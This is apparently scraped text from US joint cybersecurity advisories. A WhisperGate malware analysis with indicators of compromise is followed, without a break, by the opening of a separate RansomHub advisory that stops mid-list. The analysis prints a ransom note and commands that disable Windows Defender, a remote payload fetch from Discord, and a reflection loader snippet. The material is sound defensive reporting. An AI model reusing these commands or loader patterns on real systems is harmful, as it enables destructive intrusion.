EMBER BEAR Threat Actor Profile Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software Introduction to Acunetix GitHub: OWASP Amass Kali Linux Tutorials: Droopescan GitHub: OWASP JoomScan Kali.org: MASSCAN DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections Shodan: What is Shodan? VirusTotal: How it Works GitHub: Through the Wire Confluence Security Advisory: Confluence Server and Data Center - CVE-2022-26134 Microsoft: Security Bulletin MS17-010 Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant? Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity CERT-UA#3799 Report Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict Contact Information To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA’s 24/7 Operations Center at saycisa@cisa.dhs.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies. Version History September 5, 2024: Initial version. Appendix A: WhisperGate Malware Analysis Overview This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia. Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe. WhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg—the malicious payload that is in-memory loaded and performs the destructive capabilities.[18] Categorization The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster. Cluster 1 Cluster 1 contained the following files: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource, e.g., payload, for stage2.exe)[18] saint.exe (a downloader, SaintBot, as detailed by CERT-UA)[19] puttyjejfrwu.exe[19] Cluster 2 Cluster 2 contained: hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip (means for sending malware in over 35 different zip files via Discord links)[20] Several Microsoft Word documents with macros that download test01.exe from 3237.site. Once executed, test01.exe downloads load2022.exe from smm2021.net. Cluster 3 Cluster 3 contained: hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit 29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) asd.exe (likely a development version of stage1.exe) Behavioral Analysis Two Windows Portable Executable (PE) files (stage1.exe and stage2.exe) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe) was obtained from a U.S. victim. stage1.exe stage1.exe was obtained from the C:\ path of the Ukrainian victim’s Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe. Table 15: stage1.exe Properties MD5 5d5c99a08a7d927346ca2dafa7973fc1 SHA-256 a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[GUI32] TimeDateStamp 2022-01-10 05:37:18 Execution Message Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions. Table 16: asd.exe Properties MD5 eac0ae655d344c25ff467a929790885c SHA-256 b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[Console32,console] TimeDateStamp 1969-12-31 19:00:00 asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different. stage2.exe stage2.exe was obtained from the C:\ path of the Ukrainian victim’s Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe. Table 17: stage2.exe Properties MD5 764f691b2168e8b3b6f9fb6582e2f819 SHA-256 aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)(GUI32,signed) TimeDateStamp 2022-01-10 09:39:54 Table 18 lists the following chronological observations when stage2.exe executes. Table 18: stage2.exe Behavioral Analysis Observations Event Victim Observation PowerShell command executed twice C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== Base64 UTF-16LE string decoded Start-Sleep -s 10 HTTP GET request sent to Discord URL to download Tbopbh.jpg hxxp://cdn.discordapp.com/attachments/ 928503440139771947/930108637681184768/Tbopbh[.]jpg Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory The Visual Basic Script (VBS) file contained the following command: CreateObject(“WScript.Shell”).Run “powershell Set-MpPreference -ExclusionPath ‘C:\’”, 0, False AdvancedRun.exe created and executed twice C:\Users\\AppData\Local\Temp\AdvancedRun.exe” /EXEFilename “C:\Windows\System32\sc.exe” /WindowState 0 /CommandLine “stop WinDefend” /StartDirectory “” /RunAs 8 /Run C:\Users\\AppData\Local\Temp\AdvancedRun.exe” /EXEFilename “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” /WindowState 0 /CommandLine “rmdir ‘C:\ProgramData\Microsoft\Windows Defender’ –Recurse” /StartDirectory “” /RunAs 8 /Run InstallUtil.exe created and executed; files corrupted following execution C:\Users\\AppData\Local\Temp\InstallUtil.exe Static Analysis Static analysis was further conducted on two files (stage2.exe, Tbopbh.jpg) to uncover additional malware functionality and attributes. stage2.exe Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior. Table 19: stage2.exe Variant Properties MD5 14c8482f302b5e81e3fa1b18a509289d SHA-256 dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)(GUI32,signed) TimeDateStamp 2022-01-10 09:39:54 This variant of stage2.exe contained multiple layers of execution: stage2.exe contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the payload Tbopbh.jpg. stage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method. stage2.exe contained logic to load an Assembly object into a Stream object. stage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object. stage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze: byte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220}; stage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string: UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== When the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep -s 10 stage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg. Tbopbh.jpg (payload for stage2.exe variant) An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg: MD5: b3370eb3c5ef6c536195b3bea0120929 SHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 When viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below. Table 20: Tbopbh.jpg Properties MD5 e61518ae9454a563b8f842286bbdb87b SHA-256 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d Protector Eazfuscator(-)[-] Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)[DLL32] TimeDateStamp 2022-01-10 09:39:31 The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21: Table 21: Frkmlkdkdubkznbkmcf.dll Attributes Resources Classes Methods \u2005 \u2005 \u2009 \u2008 \u2001 \u2007 \u2009 \u200b \u200a \u2005 Note: This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review. Main - ClassLibrary1 \u0002 7c8cb5598e724d34384cce7402b11f0e pc1eOx2WJVV1579235895 – Ylfwdwgmpilzyaph 78c855a088924e92a7f60d661c3d1845 stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block: using System.Reflection; string path = "Frkmlkdkdubkznbkmcf.dll"; string fqpn = Path.GetFullPath(path); Assembly assembly = Assembly.LoadFile(fqpn); Type type = assembly.GetType("ClassLibrary1.Main"); type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null); The following application configuration accompanied the above code block to allow loading from remote sources: Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs wrote to the Windows %TEMP% directory and has the following attributes, as listed in Table 22 below. Table 22: Nmddfrqqrbyjeygggda.vbs Attributes MD5 6eed4ee0cc57126e9a096ab9905f471c SHA-256 db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f VBS Code CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C:\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes: MD5: 5a537673c34933fc854fbfb65477a686 SHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a This decrypted DLL file contained two resources, AdvancedRun and Waqybg. AdvancedRun (GZIP) MD5: de85ca91e1e8100a619de1c25112f1a5 SHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166 Waqybg (GZIP) Reversed byte order: MD5: 9b1191f1ceddf312b0d609cd929c6631 SHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3 Original byte order: MD5: 29d83f29c0b0a0b7499e71e7d5cb713f SHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2 Table 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files. Table 23: AdvancedRun (decompressed) Type Win32 EXE Company NirSoft TimeStamp 2020:08:03 09:41:38-04:00 Original File Name AdvancedRun.exe MD5 17fc12902f4769af3a9271eb4e2dacce SHA-256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b Table 24: Waqybg (reversed; decompressed) Type Win32 EXE TimeStamp 2022:01:10 03:14:38-05:00 MD5 3907c7fbd4148395284d8e6e3c1dba5d SHA-256 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[Console32,console] The reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q “%s”. Waqybg is known as WhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21] The following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted file. Table 25: File Extensions Targeted by WhisperKill u".3DM" u".3DS" u".602" u".ACCDB" u".ARC" u".ASC" u".ASM" u".ASP" u".ASPX" u".BACKUP" u".BAK" u".BAT" u".BMP" u".BRD" u".BZ2" u".CGM" u".CLASS" u".CMD" u".CONFIG" u".CPP" u".CRT" u".CSR" u".CSV" u".DBF" u".DCH" u".DER" u".DIF" u".DIP" u".DJVU.SH" u".DOC" u".DOCB" u".DOCM" u".DOCM" u".DOCX" u".DOT" u".DOTM" u".DOTX" u".DWG" u".EDB" u".EML" u".FRM" u".GIF" u".HDD" u".HTM" u".HWP" u".IBD" u".INC" u".INI" u".ISO" u".JAR" u".JAVA" u".JPEG" u".JPG" u".JSP" u".KDBX" u".KEY" u".LAY" u".LAY6" u".LDF" u".LOG" u".MAX" u".MDB" u".MDF" u".MML" u".MSG" u".MYD" u".MYI" u".NEF" u".NVRAM" u".ODB" u".ODG" u".ODP" u".ODS" u".ODT" u".OGG" u".ONETOC2" u".OST" u".OTG" u".OTP" u".OTS" u".OTT" u".P12" u".PAQ" u".PAS" u".PDF" u".PEM" u".PFX" u".PHP" u".PHP3" u".PHP4" u".PHP5" u".PHP6" u".PHP7" u".PHPS" u".PHTML" u".PNG" u".POT" u".POTM" u".POTX" u".PPAM" u".PPK" u".PPS" u".PPSM" u".PPSX" u".PPT" u".PPTM" u".PPTM" u".PPTX" u".PS1" u".PSD" u".PST" u".RAR" u".RAW" u".RTF" u".SAV" u".SCH" u".SHTML" u".SLDM" u".SLDX" u".SLK" u".SLN" u".SNT" u".SQ3" u".SQL" u".SQLITE3" u".SQLITEDB" u".STC" u".STD" u".STI" u".STW" u".SUO" u".SVG" u".SXC" u".SXD" u".SXI" u".SXM" u".SXW" u".TAR" u".TBK" u".TGZ" u".TIF" u".TIFF" u".TXT" u".UOP" u".UOT" u".VBS" u".VCD" u".VDI" u".VHD" u".VMDK" u".VMEM" u".VMSD" u".VMSN" u".VMSS" u".VMTM" u".VMTX" u".VMX" u".VMXF" u".VSD" u".VSDX" u".VSWP" u".WAR" u".WB2" u".WK1" u".WKS" u".XHTML" u".XLC" u".XLM" u".XLS" u".XLSB" u".XLSM" u".XLSM" u".XLSX" u".XLT" u".XLTM" u".XLTX" u".XLW" u".YML" u".ZIP" Malware Related to Tbopbh.jpg stage2.exe and its respective payload, Tbopbh.jpg, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below. Figure 1: stage2.exe Execution Process Template Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll. Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The hashes in Table 26 represent both byte orders. Table 26: Files Located in Discord Cluster 1 Filename MD5 (Reversed) MD5 (Functional) Afgyyppsysmtddhvhhaw.dll d034fe4c71b16b6d331886c24fef2751 4074798a621232dc448b65db7b1fdd66 Avbbwys.dll 422437f326b8dbe30cc5f103bde31f26 7f84263fd24f783ff72d5ae91011b558 Azkebvoyswvjnrpmn.dll 562c337b8caca330da2ea6ae07ee5db6 f73d203bdf924658fd6edf3444c93a50 Budoejokuqbge.dll 58e879213d81333b628434ba4aeb2751 08dfebc04eb61c9a6d87b6524c1c0f2e Bwqdffttejlkeqe.dll 1c85c0d044ac837e8939564afac1eb32 8633bd2bbbb5da22c3f8751150186c42 Bxqbsyxfkjzmhdtfceoak.dll 7234da8ceafbe6586469f18c03cc1832 5f4df6dd8e644d59eaf182e500b5e7bf Clsrncpbaucrabuobcpale.dll 618d62dd95fd9aeb855fe2ef1403dce5 955e4c198ee58e40fe92cb74ceefdf00 Cpdvzvzyghy.dll d40195a444526eafb0db56d95bf8655d a905d620717f75751aa94ceb88995dbc Ctiktdfyauejxfak.dll d06761b2cff86035a4838110ed6ab622 2ca6bcf16ee4293a771a1cf7b7b9ee49 Czxhayyankwsp.dll 59da31da4db1aa5f9a5c7c0c151422c8 de1bf141976776becd376a0dac400df6 Djpajq.dll de1f9d1f0336ddcff832ad3900acd2f1 974e7c0b3660fbf18f29eac059f85ac0 Dmdtflkcgebf.dll 394e056cb6cb732dfd5e0d45d3dae938 4d8343c40be53d6521244fe74393d937 Ejcpaujkmvjndgqznimmkgd.dll b7c1a8d39f46eaf52be90e24565dd6b0 7a70d5fbbafe3454b76e3ad2f009618f Encuutwvdqbxlxh.dll 2b39eab325906b0a3ab7e584c3d67349 df4f856f783d23fb01af1e0e64bc0e20 Esalfjyraquwfxcgufwzip.dll 80f0ee332a452172533ad8863bb3bc63 f4f4e55a00d2f3a433c9e5624285ac1c Fdgofjdvmmllgsxunb.dll 9345425cf07b4c39a80cd8540e08bfde eef2363744345741e09fe5380eeb4df3 Fkhzvcuucaprsibp.dll aecb57e20d2c0b0d9fece2cbcbcc3459 4bce4831b1dd71f19c55b3e3b5e99856 Fkthhyexkr.dll 58dc7c9577ff90a046359ca255c0c9f4 19cb20c4e7dbfe15c1aa284752d0fecb Fqattuyxknkhv.dll 5c9e2195d10375b746b6717fdb47b5b9 2b5f159f022109a8de1bc5dd9e3138a0 Fqyubbzbubsge.dll afbb9459d4a0f60d7ffb3b3532d11bc2 8d3d4d702ba6b4be2766a41bfe5ff76e Frkmlkdkdubkznbkmcf.dll b3370eb3c5ef6c536195b3bea0120929 e61518ae9454a563b8f842286bbdb87b Gsiook.dll a1b509254a0a1daa7e00d279ec974461 0e03103e8110785156105946e48ea9e0 Gutjuhi.dll 791a81f31a8e7090a7d5417451e09efa fba76f4eb2e7a2eb17193bebe290a198 Hisvswmeswmnqbvzpoxzx.dll e1a15bc13157134f542cd9c55c742460 c9d1677f4f89b95b41591b23a1dc1a63 Hsoahb.dll cd62d4a178705b2b90a8babd8613df93 032f5642d4fb2fdd74e6f20a13c57746 Icyjkszdzgoxdfuwptkwxo.dll f34f60375bebad861a35b7c4bb0fa1c8 a66b3b22a3619f739b197d0d443b700c Jdfzavlqr.dll 7fe7f33d9b5dbdf3d032d2a10e39f283 8cfef66b390f08bdbfd940922cf51650 Jrdggfjvve.dll b32e14a9b7de6c92cd16758fa6e23346 1220b580cef1bf22351e271773945d20 Jteieurqgvpgnhw.dll b85538f665fdb6c8d9a74f2df7369832 ffa68749aa3fc6495e2c49b01d964339 Kbuqtmznmodjzvxvwxcvho.dll 869742fb9db71fdb66f00528fe2966ec 5b884f15dc9b072d7bbad9ec2b249f38 Kdmvyizz.dll 2128361d8aaae1225d50c9add32006a1 9152c9de57b5647ee4ab3dff551dc8dd Kfxghcmg.dll 56e0446a6d7175a0d09110bc483ddbed fc418fdda06ce5982153766dcefb71d9 Krewcizfplntbwcqawfhtfpd.dll 6a4fca88ee36fecc5113e188cc39d25c 5c3b0040e2dece6e17093ae607b79044 Lsurhpmpyewhv.dll 143594597130e301499e5940a5fb798a 911c7e82f32f78577dcd725a7adb114d Mbkzrkfasxgxtzhgpgsehip.dll 993f01861aff306df44e6475f7886f37 e4634ef9bfe7b598b857ad997445b239 Mhnovdgzzidqx.dll 64b9feeccf6c183b9f7138f8fc53acbb 7e0c42d33921a89724424f17c97037bd Mlfampnfnmjvjnahkrawwqd.dll ddec2d79f460a881849037336ba8968f d973210977957209f255b58eb1715b12 Mppveiyannobrcdlkd.dll 9606b4720a0e73ef1f00505a11aab2f7 0adc2530cf348c0a3d53a680291a3d67 Mzhyeemgqbmamubqn.dll f772f5c65d65412f61ef5f2660e33ceb f8ffd1eab6223e31b15d0fd6c3c0472e Nbbudwt.dll 875f9200b49db08c33962b0a6bd05ab9 2e035360971a817b854d7d5a2b008717 Nhqcfzagulwaw.dll fa97dbe84ce7717b754795fa89f13dce 601c12596dfea84c2113ae5ee59a52ec Nlzhpvuzzoycqnnpl.dll d8c04ecd646a1f8537a59f63518ef3c6 47f4534da421daf8089cf34d53f6bb6e Noubvdigjlwsnqiylzgikkk.dll 3bcff990faacbebb8fb470dfe03e2543 683546b9171a1ea284a96d1b45d1d823 Nvxwbzciqarteyuz.dll c265188fdadddb648629e8060601dca7 af85885a74cfe099676af542dcdc5741 Nykfvwmchighqwcguabvgq.dll 8a2ba7f9cb6f65edf65dbe579907551e 673586594242d99ab02118595e457297 Ofgdwttnmqibnmpqx.dll 9657c2ef6ed5229740b125df9ca6c915 0dc5ac12f7690db15c99eaabc11b129c Ohtvepefcjnchrrasokn.dll a5494ffd9efb7c3df59c527076a05e62 e2cc52273d56ed66c800a726760c1ed0 Olkscszculdbzvco.dll 85afdef18d65b0518d709a5a324ea57a 77675a24040f10c85112d9a219d5f1c7 Onkwzkpfuqazvali.dll da4d81f9ef3b25ea09f34481d923dd9d cc4a9db6f250114e26d8d9ba6ab46bc9 Opaqwrazeyyilbbjlkf.dll 0e6374042b33d78329149a6189a7cb46 1934e2ebc64d41e37ef53ea0c075e974 Owxtabfdqhkaahhwsgkatuu.dll d33f608f561096be24cba91797e0da2f 332b7f6662e28e3577bd1b269904b940 Poezcjhvkzgmnyqljpbte.dll 32db8abce1618e60441f5c7cf4be0d22 2b2509c6ee46d6327f2f1c9a75122d15 Rvyqctymumtudroyae.dll dd2431b1f858b4ca14a4ea05fb8c4a06 9b2924c727aa3a061906321a66c9050c Sutragevr.dll 7d3b529db1bd896d9fd877b85cafdc64 de276cf07ccffa18d7ffc35281bca910 Sxkdxclqmxnmjgedhgagl.dll 6e1394938c2fecad2d4f5b3bcf357ec0 d6b41747cb035c4c2b08790cd57f0626 Tosyxesxgrzyb.dll 99305ce01cc2d0f58cd226efb2de893f 6859fe5a3eead00a563cd93efcc6ea96 Tpmnkauftdydomyz.dll 6c152774f6894407075e6f0a2859bbae 981160dee6cd25fb181e54eca7ff7c22 Tptjtwfhpsjfksqoajt.dll 343b140977b3f9b227e7e5f82b0fadb5 95cf2a5a24b0d33d621bb8995d5826bc Tsgblplhdwwj.dll 54a9fa9eb337a3b5ca7b0fa4553e439d cee5acbfef7e76f52f40b8ae95199c50 Uqhznlcagzyoqrbyylnnwn.dll 4c19aeecbfca13b8a199703d8b8284b9 ad0ca738aa6c987e4ee1a87ff2b8acd5 Uslrfkxccdyetfdxmaokbhv.dll dc795cb9290b1bc0b7fb1ce9d6ae7c93 552d9b79cc544fc6c3e8aa204dd00811 Waordspinycera.dll 9935a86108e3ae3f72cd15817601dcc6 5d063eecd894d3d523875bc82ef6f319 Wcfsobntsczz.dll 77aa3f342a0d69fda67c853bcc004d48 d0b00a6c83ce810ec2763af17e8ab1c4 Wpqyhvfnunlabx.dll 03af632aa6f87bf9dd4364ee3b612cbb 9f11e915be5c0d02a3130329cf032a28 Wqwpawlulyrsrjcbvuvddeud.dll 41871fef433d7b4b89fd226fe3a1a2c0 e21fe98cc8866c0eeecf3549ebcec751 Wqxpgvsgvhygmfbziucxcuh.dll 246d9f9831b125ea7e6ef21bc4c8a0ca dea3ae8225913dd98148fc86cfc3bcbe Xgcpgrxhchgwz.dll 9c695be3703194fdb71c212a0832bcf3 8744cec7547b1e73705c10a264e28e08 Xgkepoc.dll 69e58c5ee69f5e5e8a58f4afdd59adfe d43446b4a22a597b93b559821ee5ac9b Xlfthpiq.dll 540ee8e39150c539fea582b0e77be7b0 3fe96ff4a5ef0f5346ce645a2a893597 Xlocky.dll 0a2affa6d895baab087b84e93145da35 246f31c86bbbe7f65c0126cf4a1a947a Xqblktvxmnxrzwiuqdfxzrd.dll 569c1d31f4c7ec7701d8e4e51b59fe85 5eaa7e812733a5c8cda734fab2f752d5 Xykqrksoqqgyuckfc.dll 09a2d85e809d36bff82bd5ab773980a3 96964aed18f65a7acae632f358a093f6 Yawyjonk.dll 3ccf799ff208981349cee4fb1a1cf88c 4e9c55c6fe25d61ca4394de794546fab Yrknbt.dll 6154760e602bd71192d93f72fbdb486e 94bf96b76c2a092de8962496ce35deaf Yvbmuigfihprdxgiirp.dll b0d0a23766fa64ece9315f37b28bb4c0 1e22d64f263e8ea4b2d37dcd9b7c3012 Ywrovtjimixpmizuln.dll ca43a241042b5fcc305393765ae18e69 28d571ddb5c04d065dfe1be9604663ba Zfgdccnwnee.dll 251f3a4757d9e4de0499cc30c0bc00a9 755dac7edd17fbf5b5c449dd06c02e14 Zkuxhxwbvifejn.dll 9d7ab8b0aa669125d9a5adc4f46c56f3 af277ae0fbf6cc20f887696ea4756d46 Zsdflpivel.dll a9c9c0be8eca3b575c24da0fcf1af1a9 1cac5c0cb8801e8730447023270d8d56 Appendix B: Indicators of Compromise Table 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity. Table 27: IP Addresses Associated with Unit 29155 Infrastructure IP Address 5.226.139[.]66 45.141.87[.]11 46.101.242[.]222 62.173.140[.]223 79.124.8[.]66 90.131.156[.]107 112.51.253[.]153 112.132.218[.]45 154.21.20[.]82 179.43.133[.]202 179.43.142[.]42 179.43.162[.]55 179.43.175[.]38 179.43.175[.]108 (data exfiltration site) 179.43.176[.]60 179.43.187[.]47 179.43.189[.]218 185.245.84[.]227 185.245.85[.]251 194.26.29[.]84 194.26.29[.]95 194.26.29[.]98 194.26.29[.]251 Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host. Table 28: Domains Hosting Jump Host Tooling Domain Name interlinks[.]top https://3proxy[.]ru https://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber actors and should be investigated prior to blocking.) https://nssm[.]cc
Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV). Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors. The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site. The authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents. Download the PDF version of this report: AA24-242A #StopRansomware: RansomHub Ransomware (PDF, 825.67 KB ) For a downloadable copy of IOCs, see: AA24-242A STIX XML (XML, 133.74 KB ) AA24-242A STIX JSON (JSON, 109.41 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. Initial Access RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed: CVE-2023-3519 (CWE-94) Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root. CVE-2023-27997 (CWE-787 | CWE-122) A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, 